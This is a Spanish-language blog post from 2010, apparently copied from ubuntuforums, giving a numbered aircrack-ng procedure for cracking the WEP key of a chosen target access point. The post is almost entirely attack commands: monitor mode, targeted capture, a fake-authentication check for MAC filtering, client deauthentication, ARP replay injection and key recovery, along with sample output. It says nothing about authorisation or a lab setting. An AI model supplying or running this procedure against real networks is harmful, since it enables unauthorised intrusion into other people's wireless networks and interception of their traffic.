martes, 26 de enero de 2010

Howto: Aircrack-NG WEP Key

Linea de comandos (terminal) como root:


1. Habilitar el modo monitor:

$ airmon-ng start (interface)


2. Captura de paquetes:

$ airodump-ng (interface)


Luego de identificar un AP objetivo:

$ airodump-ng --channel (#) --bssid (AP MAC) --write (file_name) (interface)

3. Verificar que el filtro MAC este activado o desactivado:

$ aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (Mi MAC) (interface)

Si en la salida se ve algo como esto...

18:22:32 Sending Authentication Request

18:22:32 Authentication successful

18:22:32 Sending Association Request

18:22:32 Association successful :-)


...entonces el filtro MAC esta desactivado y podemos continuar con la sección 'No MAC

filtering', de otra forma salta a la sección 'MAC filtering'.


Sin filtro MAC


4. Reinjeccion de paquetes:

$ aireplay-ng -3 -b (AP MAC) -h (Mi MAC) (interface)

En esta parte veremos los paquetes de datos capturados y disparados en 'airodump-ng'. Este proceso puede durar 5 minutos antes de comenzar a recibir pedidos ARP. Como el filtro MAC esta deshabilitado, puedes utilizar una MAC address aleatoria.

Saltar al #7.

Con filtro MAC


5. Desautenticacion:

$ aireplay-ng -0 5 -a (AP MAC) -c (Client MAC) (interface)

6. Reinjeccion de paquetes:

$ aireplay-ng -3 -b (AP MAC) -h (Client MAC) (interface)

Veremos el numero de paquetes en 'airodump-ng'. Este proceso puede tomar mas de 5 minutos antes de empezar a recibir pedidos ARP, asi que sea paciente.


7. Desencriptado:

$ aircrack-ng (file_name).cap



Fuente: ubuntuforums



Artículos relacionados



Widget by Hoctro | Jack Book

0 comments:

Publicar un comentario